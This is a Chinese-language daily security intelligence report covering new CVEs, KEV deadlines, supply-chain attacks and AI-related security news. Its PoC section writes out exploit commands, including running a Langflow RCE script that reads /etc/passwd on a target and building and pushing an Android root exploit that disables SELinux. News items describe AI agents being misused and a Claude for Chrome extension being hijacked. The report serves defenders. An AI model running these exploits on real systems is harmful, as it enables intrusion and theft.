每日安全情报报告 · 2026-07-16
每日安全情报报告报告日期2026-07-16覆盖周期2026-07-14 至 2026-07-16近 48 小时风险等级 高危本期关键词SonicWall 双零日 · 微软创纪录补丁日 · SAP NetWeaver 9.9 · AsyncAPI 供应链攻击 · Cursor 0-Day · GPT-5.6 漏洞链风险摘要近 48 小时内安全态势持续升温。CISA 于 7 月 14 日一次性新增 4 项 KEV已知被利用漏洞其中 SonicWall SMA1000 双零日 CVSS 10.0 SSRF 在野利用、微软 SharePoint/AD FS 两个零日同步在野利用。微软 7 月补丁日创历史记录修复 570 漏洞。SAP NetWeaver 曝出 CVSS 9.9 内存损坏漏洞。npm 生态遭 AsyncAPI 供应链攻击Miasma RAT 通过 GitHub Actions pwn request 投递至 300 万周下载量包。Cursor AI 编辑器未修补 0-Day 允许恶意 Git 仓库自动执行代码。GPT-5.6 Sol Ultra 被证实仅从安全补丁即可构建完整 Chrome 漏洞利用链。一、最新高危漏洞1.1 CVE-2026-15409 — SonicWall SMA1000 SSRF在野利用 · CISA KEV项目详情CVE 编号CVE-2026-15409漏洞类型服务端请求伪造SSRF受影响组件SonicWall SMA1000 系列型号 6210/7210/8200vCVSS 评分10.0Critical在野利用✅ 已确认SonicWall 调查到多个利用案例CISA KEV2026-07-14 新增截止日期2026-07-17修复版本Hotfix 12.4.3-03453 / 12.5.0-02835远程未认证攻击者可通过 Work Place 接口发起 SSRF让设备向攻击者控制的地址发出请求可能导致内部网络探测或进一步攻击链。SonicWall PSIRT 公告NVD 详情CISA KEV 目录1.2 CVE-2026-15410 — SonicWall SMA1000 代码注入在野利用 · CISA KEV项目详情CVE 编号CVE-2026-15410漏洞类型代码注入OS Command Injection受影响组件SonicWall SMA1000 Appliance Management Console (AMC)CVSS 评分7.2High在野利用✅ 已确认CISA KEV2026-07-14 新增截止日期2026-07-17认证后管理员可通过 Management Console 执行任意操作系统命令与 CVE-2026-15409 组合可形成完整攻击链。NVD 详情BleepingComputer 报道1.3 CVE-2026-56164 — Microsoft SharePoint Server 权限提升在野利用 · CISA KEV项目详情CVE 编号CVE-2026-56164漏洞类型关键功能缺失认证CWE-306受影响组件Microsoft SharePoint ServerCVSS 评分5.3Medium但在野利用风险极高在野利用✅ 已确认微软 DART 在事件响应中发现CISA KEV2026-07-14 新增截止日期2026-07-17未认证远程攻击者可通过网络提升权限。CISA 同时发布 SharePoint 加固公告将此漏洞与 CVE-2026-32201、CVE-2026-45659 关联——攻击者可利用 SharePoint 三漏洞组合链实现 RCE IIS 机器密钥窃取 补丁后持久化。MSRC 详情NVD 详情1.4 CVE-2026-56155 — Microsoft AD FS 权限提升在野利用 · CISA KEV项目详情CVE 编号CVE-2026-56155漏洞类型访问控制粒度不足CWE-1220受影响组件Microsoft Active Directory Federation Services (AD FS)CVSS 评分7.8High在野利用✅ 已确认微软 DART 在事件响应中发现CISA KEV2026-07-14 新增截止日期2026-07-28认证本地攻击者可提升至 AD FS 管理员权限。AD FS 是混合 Azure AD 和本地环境的身份联合基础设施一旦被突破可横行整个身份信任链攻击思路类似黄金 SAML。MSRC 详情NVD 详情1.5 CVE-2026-44747 — SAP NetWeaver AS ABAP 内存损坏项目详情CVE 编号CVE-2026-44747漏洞类型内存损坏Out-of-Bounds Write受影响组件SAP NetWeaver Application Server ABAP版本 7.22 至 9.20CVSS 评分9.9Critical在野利用暂无确认修复SAP Security Note 3747367低权限认证攻击者可利用内存管理逻辑错误造成内存损坏潜在实现任意代码执行跨信任边界完全妥协机密性、完整性和可用性。NVD 详情SAP 安全公告SecurityWeek 报道1.6 CVE-2026-27690 — SAP Approuter HTTP 请求走私项目详情CVE 编号CVE-2026-27690漏洞类型HTTP 请求走私Request Smuggling受影响组件SAP Approuter版本 20.10.0非 Cloud Foundry 部署CVSS 评分9.1Critical修复SAP Security Note 3720138未认证远程攻击者可发送特制 HTTP 请求拦截或操纵用户响应导致拒绝服务或信息泄露。NVD 详情1.7 CVE-2026-55040 — SharePoint JWT 认证绕过Pwn2Own 链项目详情CVE 编号CVE-2026-55040漏洞类型JWT 令牌验证绕过Security Feature Bypass受影响组件Microsoft SharePoint ServerCVSS 评分9.1Critical在野利用暂无确认但为 Pwn2Own Berlin 预认证 RCE 链的前半段修复状态JWT 绕过已修复RCE 组件推迟至 8 月补丁日Rapid7 在 Pwn2Own Berlin 中利用此漏洞实现未认证远程攻击者冒充任意 SharePoint 用户仅需知道目标用户名或 SID并与另一个 RCE 漏洞链接实现未认证 RCE。RCE 部分计划在 8 月补丁日修复在此之前 SharePoint 处于半暴露状态。MSRC 详情Rapid7 分析1.8 CVE-2026-56190 — Windows RDP 远程代码执行项目详情CVE 编号CVE-2026-56190漏洞类型使用未初始化资源受影响组件Windows Remote Desktop Protocol (RDP)CVSS 评分9.8Critical在野利用暂无确认但 RDP 漏洞历史武器化速度极快蠕虫化风险类似 BlueKeepCVE-2019-0708可蠕虫传播未认证网络攻击者可通过 RDP 远程执行任意代码。RDP 是互联网上最广泛暴露的服务之一也是勒索软件的主要初始访问向量。MSRC 详情1.9 CVE-2026-57092 — Hyper-V VMSwitch 虚拟机逃逸项目详情CVE 编号CVE-2026-57092漏洞类型Use-After-FreeCWE-416受影响组件Windows VMSwitchHyper-V 虚拟网络CVSS 评分9.9Critical在野利用暂无确认微软评级Exploitation More Likely影响范围Windows Server 2016–2025、Windows 10/11 Hyper-V 主机低权限 VM 内部攻击者可跨越 VM 边界实现主机 SYSTEM 权限对云服务提供商和多租户虚拟化环境构成严重威胁。MSRC 详情1.10 CVE-2026-56451 — Siemens Opcenter X JWT 认证绕过项目详情CVE 编号CVE-2026-56451漏洞类型JWT 算法验证绕过受影响组件Siemens Opcenter XV2604 之前所有版本CVSS 评分10.0Critical在野利用暂无确认影响制造执行系统MES完全接管未认证远程攻击者可伪造任意 JWT 令牌绕过认证影响生产计划、质量管理和供应链运营。CSA 新加坡公告1.11 CVE-2026-50661 — Windows BitLocker 物理绕过零日 · 已公开 PoC项目详情CVE 编号CVE-2026-50661漏洞类型安全功能绕过受影响组件Windows BitLockerCVSS 评分6.2Medium在野利用暂无确认但 PoC 代码已公开修复已在 7 月补丁日修复物理攻击者可在恢复环境中绕过 BitLocker 全盘加密访问受保护数据。与此前 YellowKeyCVE-2026-45585攻击思路类似。MSRC 详情1.12 微软 7 月 Patch Tuesday 概览指标数值修复 CVE 总数~570-622史上最大单月发布Critical 级别57-59 个零日漏洞3 个2 个在野利用 1 个公开披露在野利用零日CVE-2026-56164SharePoint、CVE-2026-56155AD FS公开披露零日CVE-2026-50661BitLocker其他严重漏洞CVE-2026-58644 SharePoint RCE、CVE-2026-58608 Print Spooler RCEBleepingComputer 报道Tenable 分析二、最新漏洞 PoC2.1 CVE-2026-6307 — Chrome V8 JS-to-Wasm 类型混淆 RCE项目详情CVE 编号CVE-2026-6307漏洞类型V8 引擎 JS-to-Wasm 类型混淆影响范围Chrome 106-146约 4 年版本修复版本 ≥ 147.0.7727.101PoC 来源GitHub - 0xsha/CVE-2026-6307技术分析Nebula Security - Longinus漏洞原理JSToWasmFrameStateFunctionInfo的等号运算符省略了 Wasm 签名比较导致 CSE/GVN 合并了仅签名不同的帧状态。延迟反优化时将 Wasm i64 错误物化为 tagged externref反之亦然产生非笼子压缩的 64 位 addrof/fakeobj 原语。使用步骤# 1. 克隆 PoC 仓库 git clone https://github.com/0xsha/CVE-2026-6307.git cd CVE-2026-6307 # 2. Flag-free 原语测试无需特殊 flags在 Chrome 146 上运行 # 启动 HTTP 服务器 python3 -m http.server 8080 # 3. 在 Chrome 146 中访问以下页面 # http://127.0.0.1:8080/flag-free/00-reachability-flagfree.html # 触发混淆状态 # http://127.0.0.1:8080/flag-free/01-primitives-flagfree.html # addrof/fakeobj # http://127.0.0.1:8080/flag-free/02-store-flagfree.html # 越笼存储 # http://127.0.0.1:8080/flag-free/03-arw-flagfree.html # 笼内读写 # 4. RCE 演示需无 ASLR 实验环境 cd rce-no-aslr/ ./run.sh calc # 弹出 xcalc 计算器 ./run.sh exit # strace 确认 exit(66)技术亮点无需--allow-natives-syntaxflag 即可触发所有地址运行时泄漏无硬编码。另一个 PoC 仓库 J4ck3LSyN-Gen2/CVE-2026-6307-Longinus 提供了 YARA 检测规则。2.2 CVE-2026-43499 — GhostLock Linux 内核 Futex UAF 提权OnePlus Bootloader 越狱项目详情CVE 编号CVE-2026-43499漏洞类型Futex PI Use-After-Free影响范围Linux 内核 2.6.39 ~ 7.1主线 7.1 已修复Android GKI 6.12.x 仍受影响PoC 来源GitHub - JoinChang/ghostlock-ace6t漏洞原理pselect6系统调用将fd_set数据复制到内核栈。与 futex PI 等待机制结合时已释放的栈帧可被回收为rt_mutex_waiter结构。PI 链遍历时的红黑树重平衡将受控值写入任意内核地址。利用效果在 OnePlus Ace 6TSnapdragon 8s EliteAndroid 16内核 6.12.38上验证成功实现 root KernelSU 安装无需解锁 bootloader。使用步骤# 1. 克隆仓库 git clone https://github.com/JoinChang/ghostlock-ace6t.git cd ghostlock-ace6t # 2. 设置 NDK 路径并编译 NDK/path/to/android-ndk $NDK/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android35-clang \ -O2 -Wall -Isrc -DTARGET_CONFIG_Htargets/ace6t/target.h \ src/targets/ace6t/main.c src/targets/ace6t/util.c src/slide.c \ src/targets/ace6t/fops.c src/pipe.c src/root.c src/targets/ace6t/miniadb.c \ -o ghostlock -fPIE -pie -pthread # 3. 推送到设备并执行 adb tcpip 5555 adb push ~/.android/adbkey /data/local/tmp/a/adbkey adb push ghostlock /data/local/tmp/a/e chmod 755 /data/local/tmp/a/e # 4. 执行完整利用 /data/local/tmp/a/e # 完整利用adb shell /data/local/tmp/a/e --bootstrap # 手机独立模式app context /data/local/tmp/a/e --write1 # 仅禁用 SELinux2.3 CVE-2026-47291 — Windows HTTP.sys 远程代码执行PoC 已公开项目详情CVE 编号CVE-2026-47291漏洞类型整数溢出导致堆溢出Ring 0 内核级影响范围Windows HTTP.sys影响所有运行 IIS/HTTP 服务的 Windows 系统PoC 来源GitHub - omair2084/misc研究员 w3bd3vil 于 7/11 发布漏洞原理攻击者发送带有特殊构造Content-Length或Transfer-Encoding: chunked头部的 HTTP 请求HTTP.sys 在解析时做乘法/加法计算缓冲区大小结果超过uint32最大值发生回绕分配过小缓冲区。随后完整数据写入导致内核堆溢出攻击者获得内核级写入原语可劫持控制流获取 SYSTEM 权限。风险可安装持久化后门、Dump LSASS、横向移动、绕过 EDR、部署勒索软件。内核级触发不产生应用层异常日志。使用步骤# 1. 克隆 PoC 仓库 git clone https://github.com/omair2084/misc.git cd misc # 2. 查看 PoC 文件Python 脚本 # 当前 PoC 包含触发机制但可能不含完整武器化 exploit # 3. 在隔离测试环境中运行 python3 http_sys_overflow_poc.py --target http://target:port2.4 LegacyHive — Windows ProfSvc 权限提升零日PoC 已公开项目详情漏洞类型用户配置文件服务任意 Hive 加载影响范围Windows未修复PoC 发布者研究员 Chaotic Eclipseaka Nightmare-Eclipse发布时间2026-07-15微软 Patch Tuesday 后数小时漏洞原理标准用户可加载其他用户的注册表配置单元Hive。需要另一个标准用户凭据和第三个用户名可以是管理员账户。成功利用后可将目标用户 Hive 挂载到当前用户 classes root 中实现权限提升。PoC 说明公开发布的版本已精简以防止直接武器化利用原始漏洞不需要额外用户凭据。微软目前未修复此漏洞。The Hacker News 报道FreeBuf 报道2.5 CVE-2026-0770 — LangFlow 未认证 RCEPoC 已公开项目详情CVE 编号CVE-2026-0770漏洞类型不可信控制球面功能包含CWE-829/ 代码注入影响范围Langflow补丁前所有版本PoC 来源GitHub - Ez4rd1x1/CVE-2026-0770漏洞原理/validate端点的exec_globals参数未进行输入验证攻击者可传入不可信全局环境实现以 root 用户身份执行任意代码。使用步骤# 1. 克隆 PoC 仓库 git clone https://github.com/Ez4rd1x1/CVE-2026-0770.git cd CVE-2026-0770 # 2. 执行漏洞利用 python3 exp_v3.py -t http://target:7860 -c cat /etc/passwd # 3. 自动登录获取 token 后发送 payload # 脚本会自动完成登录 → 获取 token → 构造 payload → 发送请求 → 输出结果三、网络安全最新文章3.1 GPT-5.6 Sol Ultra 仅从安全补丁构建完整 Chrome 漏洞利用链OpenAI 的 GPT-5.6 Sol Ultra 模型仅使用公开可用的安全补丁提交diff/commit独立构建了一个完整的、可工作的 Google Chrome 漏洞利用链。这标志着 AI 在漏洞发现和利用构建方面的能力达到新里程碑也引发了对 AI 安全能力的双重思考——既能加速防御也能加速攻击。阅读原文CybersecurityNews3.2 Cursor AI 编辑器未修补 0-Day恶意 Git 仓库可自动执行 Windows 代码AI 代码编辑器 Cursor超过 700 万开发者使用存在严重未修补漏洞当在 Windows 上打开一个仓库时如果项目根目录中存在名为git.exe的文件Cursor 会自动运行它——无需点击、无需批准对话框、无任何警告。攻击者可借此以登录用户身份执行任意代码访问源码、SSH 密钥和云令牌。Mindgard 于 2025 年 12 月报告该漏洞7 个月后仍未修复。阅读原文The Hacker News3.3 AsyncAPI npm 供应链攻击Miasma RAT 通过 GitHub Actions pwn request 投递7 月 14 日攻击者通过 GitHub Actionspull_request_target漏洞pwn request入侵两个 AsyncAPI GitHub 仓库利用项目自己的发布流水线发布了 5 个恶意 npm 包周下载量超 300 万。恶意代码在require()时触发而非安装时因此--ignore-scripts无法防护。最终投递 Miasma RAT——一个 3.08 MB 模块化框架支持 130 种凭据窃取、6 个独立 C2 通道、LAN 横向移动和 AI 编码助手投毒。阅读原文Datadog Security Labs阅读原文StepSecurity阅读原文Chainguard3.4 黑客使用 Gemini CLI 在 6 分钟内构建实时 CC 僵尸网络一个名为 bandcampro 的俄语威胁行为者武器化了 Google 的 Gemini CLI AI 代理用于迁移、部署和操作一个实时的命令与控制CC僵尸网络。整个构建过程仅耗时 6 分钟包括自动搭建新的 C2 服务器。这表明 AI 代理正在大幅降低攻击门槛。阅读原文CybersecurityNews3.5 Claude for Chrome 漏洞恶意扩展可读取 Gmail、Docs 和 CalendarManifold Security 披露 Anthropic 的 Claude for Chrome 浏览器扩展存在信任边界缺陷与 ClaudeBleed 相关。任何能在 claude.ai 上运行脚本的其他浏览器扩展仍可触发 Claude for Chrome 针对 Gmail、Google Docs 和 Calendar 的任务。尽管 Anthropic 在 5 月限制了任意提示路径并发布了 8 个后续版本漏洞在 v1.0.80 中仍然可复现。阅读原文The Hacker News3.6 LabubaRAT伪装为 NVIDIA 软件的 Rust 远控木马Blackpoint Cyber 披露了一个此前未记录的基于 Rust 的远程访问木马 LabubaRAT伪装为 NVIDIA 容器运行时nvidia-sysruntime.exe。具备主机分析、安全工具识别、文件传输、截图、流量代理等功能支持 HTTPS、WebView2、DNS 隧道多种通信方式以 MaaS 模式提供。阅读原文The Hacker News3.7 OkoBot 恶意软件框架针对硬件钱包的助记词钓鱼自 2025 年 4 月起活跃的 Windows 恶意软件框架 OkoBot 包含 SeedHunter 模块专门窃取硬件钱包恢复短语。该模块监视 Trezor Suite、Ledger Wallet 和 Ledger Live 应用程序在真实钱包应用内部注入恶意页面。携带 20 个 payload受害者遍布 25 个国家。阅读原文The Hacker News3.8 TuxBot v3LLM 辅助开发的 IoT 僵尸网络框架Palo Alto Networks Unit 42 披露了一个此前未报告的 IoT 像尸网络框架 TuxBot v3 Evolution该框架显示出由大语言模型辅助开发的迹象。AI 生成的代码中包含了开发者未删除的安全免责声明多个函数无法正常工作。支持跨架构编译ARM/MIPS/x86_64/PowerPC/RISC-V。阅读原文The Hacker News3.9 RabbitMQ 漏洞可泄露 OAuth 密钥并暴露跨租户队列元数据Miggo 安全团队发现影响 RabbitMQ 消息代理服务的两个访问控制漏洞漏洞一可将 broker 的 OAuth 密钥泄露给未认证攻击者单次请求即可可能导致完整 broker 接管漏洞二允许任何登录用户静默读取其他租户数据绕过租户边界。两个漏洞自 2024 年初就存在于代码库中影响 RabbitMQ 3.13.0。阅读原文The Hacker News3.10 美国指控两家俄罗斯防弹托管公司帮助黑客窃取数千万美元美国司法部在俄亥俄州北区公布起诉书指控三名俄罗斯公民和两家总部位于俄罗斯的防弹托管公司帮助黑客窃取数千万美元。这些公司为勒索软件团伙、钓鱼操作和其他网络犯罪活动提供基础设施服务。阅读原文CybersecurityNews3.11 Firefox 和 Chrome 修复多个严重漏洞Mozilla Firefox 152.0.6 修复了 CVE-2026-15718WebAssembly 无效指针和 CVE-2026-15719Navigation 站点隔离利用代码已公开但未发现野外攻击。Google Chrome 修复 15 个缺陷含 2 个严重 UAFCVE-2026-15764、CVE-2026-15765Ozone 组件影响 Linux/ChromeOS/Fuchsia。阅读原文The Hacker News3.12 黑客滥用 Claude 共享聊天和 Google 广告部署 MacSync 窃取程序威胁行为者劫持 Anthropic 的 Claude AI 平台共享聊天功能和 Google 广告诱骗 Mac 用户感染自身部署新型信息窃取恶意软件 MacSync。这是 AI 平台被滥用于恶意软件分发的新案例。阅读原文CybersecurityNews四、CISA KEV 动态7 月 14 日新增4 项CVE产品漏洞类型截止日期CVE-2026-15409SonicWall SMA1000SSRF2026-07-17CVE-2026-15410SonicWall SMA1000代码注入2026-07-17CVE-2026-56164Microsoft SharePoint缺失认证2026-07-17CVE-2026-56155Microsoft AD FS访问控制不足2026-07-287 月 10 日新增2 项CVE产品漏洞类型截止日期CVE-2026-48939iCagenda文件上传2026-07-13CVE-2026-56291Balbooa Forms文件上传2026-07-137 月 7 日新增3 项CVE产品漏洞类型截止日期CVE-2026-48908JoomShaper SP Page Builder文件上传已截止CVE-2026-55255LangflowIDOR已截止CVE-2026-56290Joomlack Page Builder访问控制已截止CISA KEV 目录五、风险态势总结当前活跃在野利用 KEV按紧急度排序优先级CVE产品截止日期状态 紧急CVE-2026-15409SonicWall SMA1000 SSRF2026-07-17今日截止 紧急CVE-2026-15410SonicWall SMA1000 代码注入2026-07-17今日截止 紧急CVE-2026-56164Microsoft SharePoint2026-07-17今日截止 高CVE-2026-56155Microsoft AD FS2026-07-2812 天⚠️ 逾期CVE-2026-48939iCagenda2026-07-13已逾期 3 天⚠️ 逾期CVE-2026-56291Balbooa Forms2026-07-13已逾期 3 天本期重点SonicWall SMA1000 双零日 CVSS 10.0今日 KEV 截止攻击链组合 SSRF 代码注入可完全接管 VPN 网关设备微软创纪录补丁日570 CVE 修复压力巨大SharePoint/AD FS 两个在野利用零日优先级最高SharePoint 三漏洞组合链CVE-2026-32201 CVE-2026-45659 CVE-2026-56164 → RCE IIS 密钥窃取 持久化SAP NetWeaver CVSS 9.9企业 ERP 核心基础设施内存损坏漏洞可跨信任边界完全接管AsyncAPI npm 供应链攻击Miasma RAT 通过 pwn request 投递--ignore-scripts无效SLSA provenance 验证通过Cursor 0-Day 未修补恶意 Git 仓库可自动执行 Windows 代码700 万开发者受影响GPT-5.6 构建 Chrome 漏洞链AI 从安全补丁独立构建完整利用链标志 AI 安全攻防新阶段Hyper-V VMSwitch 逃逸 CVSS 9.9VM 可逃逸至主机 SYSTEM云服务商和多租户环境最高风险防御建议立即修补SonicWall SMA1000今日 KEV 截止、SharePoint CVE-2026-56164、AD FS CVE-2026-56155审计 npm 依赖检查是否安装了 AsyncAPI 恶意版本轮换所有暴露凭据搜索sync.js和.miasma持久化痕迹加固 SharePoint按 CISA 加固公告实施检查 IIS 机器密钥是否泄露审计异常 Site Member 活动限制 RDP 暴露CVE-2026-56190 可蠕虫化互联网暴露的 RDP 服务应立即限制访问Hyper-V 环境加固CVE-2026-57092 影响所有 Hyper-V 主机优先修补云和多租户环境SAP 修补优先应用 SAP Note 3747367NetWeaver ABAP CVSS 9.9审计 Commerce Cloud 是否残留默认 OAuth2 凭据AI 安全治理GPT-5.6 漏洞链构建能力表明需要重新评估 AI 安全治理框架Cursor 0-Day 提示 AI 编码工具自身也是攻击面对所有 PoC 代码保持警惕ChocoPoC RAT 仍通过伪造 GitHub PoC 仓库攻击安全研究人员仅在隔离环境中执行六、参考来源CISA KEV 目录MSRC 7 月安全更新SonicWall PSIRTSAP 7 月安全公告The Hacker NewsCybersecurityNewsBleepingComputerFreeBufDatadog Security LabsStepSecurityRapid7TenableNVDGitHub Security Advisories免责声明本报告仅供安全研究和防御参考。所有漏洞利用信息来源于公开渠道请在合法授权范围内使用。